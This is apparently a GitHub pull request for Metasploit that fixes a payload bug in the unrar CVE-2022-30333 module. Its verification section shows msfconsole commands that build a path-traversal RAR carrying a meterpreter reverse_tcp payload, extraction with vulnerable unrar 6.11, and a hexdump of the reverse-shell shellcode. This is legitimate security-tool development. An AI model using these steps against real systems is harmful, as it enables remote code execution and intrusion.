metasploit-framework
metasploit-framework copied to clipboard
Published
20 hours ago •
rapid7
rapid7
Fix a payload bug in unrar_cve_2022_30333
I'm not sure why, but setting Space messes things up. This fixes https://github.com/rapid7/metasploit-framework/issues/16924
Verification
Run the exploit:
msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil
TARGET_PATH => ../../../../../../../../tmp/evil
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
[*] Target filename: ../../../../../../../../tmp/evil
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
Unrar the payload.rar file with Unrar 6.11 or earlier:
ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
UNRAR 6.11 freeware Copyright (c) 1993-2022 Alexander Roshal
Extracting from ./payload.rar
Extracting ylhfjkhlfu OK
Extracting ylhfjkhlfu OK
All OK
The start of the file should be the payload (followed by random junk):
ron@fedora ~/.msf4/local $ hexdump -C /tmp/evil | head
00000000 48 31 ff 6a 09 58 99 b6 10 48 89 d6 4d 31 c9 6a |H1.j.X...H..M1.j|
00000010 22 41 5a b2 07 0f 05 48 85 c0 78 51 6a 0a 41 59 |"AZ....H..xQj.AY|
00000020 50 6a 29 58 99 6a 02 5f 6a 01 5e 0f 05 48 85 c0 |Pj)X.j._j.^..H..|
00000030 78 3b 48 97 48 b9 02 00 11 5c 0a 00 00 92 51 48 |x;H.H....\....QH|
00000040 89 e6 6a 10 5a 6a 2a 58 0f 05 59 48 85 c0 79 25 |..j.Zj*X..YH..y%|
00000050 49 ff c9 74 18 57 6a 23 58 6a 00 6a 05 48 89 e7 |I..t.Wj#Xj.j.H..|
00000060 48 31 f6 0f 05 59 59 5f 48 85 c0 79 c7 6a 3c 58 |H1...YY_H..y.j<X|
00000070 6a 01 5f 0f 05 5e 6a 7e 5a 0f 05 48 85 c0 78 ed |j._..^j~Z..H..x.|
00000080 ff e6 6c d3 58 9b a5 5c 96 55 58 92 b9 d1 d8 f7 |..l.X..\.UX.....|
